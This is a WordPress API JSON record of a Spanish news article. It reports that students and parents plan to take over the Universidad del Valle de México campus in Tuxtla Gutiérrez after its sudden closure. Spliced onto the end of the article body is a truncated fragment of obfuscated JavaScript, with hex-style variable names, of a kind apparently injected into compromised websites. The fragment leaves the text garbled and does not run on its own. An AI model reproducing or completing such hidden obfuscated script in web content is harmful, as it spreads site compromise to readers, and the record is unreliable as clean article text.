{"id":22132,"date":"2025-05-29T03:00:40","date_gmt":"2025-05-29T03:00:40","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22132"},"modified":"2025-05-29T03:00:40","modified_gmt":"2025-05-29T03:00:40","slug":"arrancan-protestas-por-cierre-de-la-uvm","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22132","title":{"rendered":"Arrancan protestas por cierre de la UVM"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"501\" height=\"397\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141518.jpg\" alt=\"\" class=\"wp-image-22133\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141518.jpg 501w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000141518-300x238.jpg 300w\" sizes=\"auto, (max-width: 501px) 100vw, 501px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez<\/p>\n\n\n\n<p>28 de mayo del 2025. Tuxtla Guti\u00e9rrez.- Alumnos y padres de familia de la Universidad Valle de M\u00e9xico campus Tuxtla Guti\u00e9rrez tomar\u00e1n este plantel a partir de este jueves debido al cierre inesperado de la instituci\u00f3n, lo cual deja el limbo a los alumnos que todav\u00eda est\u00e1n cursando las diferentes carreras.<\/p>\n\n\n\n<p>Se\u00f1alaron que, este anuncio del cierre fue de la noche a la ma\u00f1ana, \u201cnos tomaron desprevenidos y por sorpresa no sab\u00edamos nada\u201d.<\/p>\n\n\n\n<p>\u201cDe manera inesperada y sin previo aviso, la Universidad del Valle de M\u00e9xico ha anunciado el cierre de sus puertas y la interrupci\u00f3n de sus servicios en nuestro campus. Esta decisi\u00f3n, tomada de forma unilateral, deja a cientos de j\u00f3venes con sus estudios truncados y sus sue\u00f1os de un futuro profesional en vilo\u201d, cita el escrito.<\/p>\n\n\n\n<p>Expresaron que: \u201cNuestros hijos e hijas han dedicado tiempo, esfuerzo y recursos para construir su educaci\u00f3n en la UVM. Han invertido sus esperanzas y aspiraciones en esta instituci\u00f3n. El cierre abrupto no solo interrumpe su trayectoria acad\u00e9mica, sino que tambi\u00e9n genera una enorme incertidumbre y frustraci\u00f3n\u201d,<\/p>\n\n\n\n<p>En este sentido exigieron que la UVM asuma su responsabilidad y garantice la continuidad del servicio educativo hasta que cada uno de los estudiantes del Campus Tuxtla Guti\u00e9rrez pueda culminar sus estudios.<\/p>\n\n\n\n<p>\u201cEs un derecho fundamental que nuestros j\u00f3venes reciban la formaci\u00f3n por la que han pagado y en la que han depositado su confianza\u201d, expresaron.<\/p>\n\n\n\n<p>En este escenario invitaron a toda la comunidad Lince, a los estudiantes afectados, a sus familias, exalumnos y a la sociedad en general, a sumarse a esta causa.<\/p>\n\n\n\n<p>Expresaron que: \u201cEs momento de unirnos y alzar la voz para defender los derechos de nuestros j\u00f3venes\u201d<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez 28 de mayo del 2025. Tuxtla Guti\u00e9rrez.- Alumnos y padres de familia de la Universidad Valle de M\u00e9xico campus Tuxtla Guti\u00e9rrez tomar\u00e1n este plantel a partir de este jueves debido al cierre inesperado de la instituci\u00f3n, lo cual deja el limbo a los alumnos que todav\u00eda est\u00e1n cursando las diferentes carreras. Se\u00f1alaron que, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22133,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22132","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22132","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22132"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22132\/revisions"}],"predecessor-version":[{"id":22134,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22132\/revisions\/22134"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22133"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22132"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22132"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22132"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}